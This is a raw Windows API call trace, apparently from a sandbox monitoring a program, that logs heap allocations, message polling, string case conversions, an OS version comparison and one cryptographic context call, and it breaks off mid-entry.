1 [0242.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.713] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.713] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0242.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0242.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0242.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0242.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0242.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0242.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0242.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0242.714] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0242.714] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.714] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.714] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0242.714] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.714] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0242.714] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0242.715] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0242.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0242.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0242.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0242.715] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2a50) returned 1 [0242.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0242.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0242.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0242.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0242.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0242.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0242.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0242.716] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0242.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0242.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0242.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0242.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0242.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0242.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0242.717] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.717] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0242.717] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0242.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0242.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0242.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0242.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0242.717] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0242.717] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.718] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0242.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0242.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0242.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0242.718] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.718] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.718] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.718] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.718] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0242.718] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0242.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0242.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0242.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0242.718] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0242.718] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.718] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0242.719] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.719] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.719] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0242.719] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0242.719] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0242.719] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0242.719] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0242.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0242.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0242.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0242.720] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0242.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0242.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0242.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0242.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0242.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0242.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0242.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0242.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0242.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0242.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0242.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0242.721] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0242.721] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0242.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0242.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.721] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0242.721] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.721] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0242.721] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0242.721] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0242.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0242.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0242.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0242.722] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0242.722] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0242.722] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0242.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0242.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0242.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0242.722] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.722] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0242.722] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0242.722] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0242.723] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0242.723] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.723] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0242.723] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.723] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.723] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0242.723] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0242.724] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.724] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0242.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0242.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0242.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0242.724] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.724] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.724] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0242.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0242.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0242.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0242.724] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0242.724] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0242.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0242.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0242.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0242.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0242.725] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0242.725] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.725] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0242.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0242.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0242.725] RtlAllocateHeap 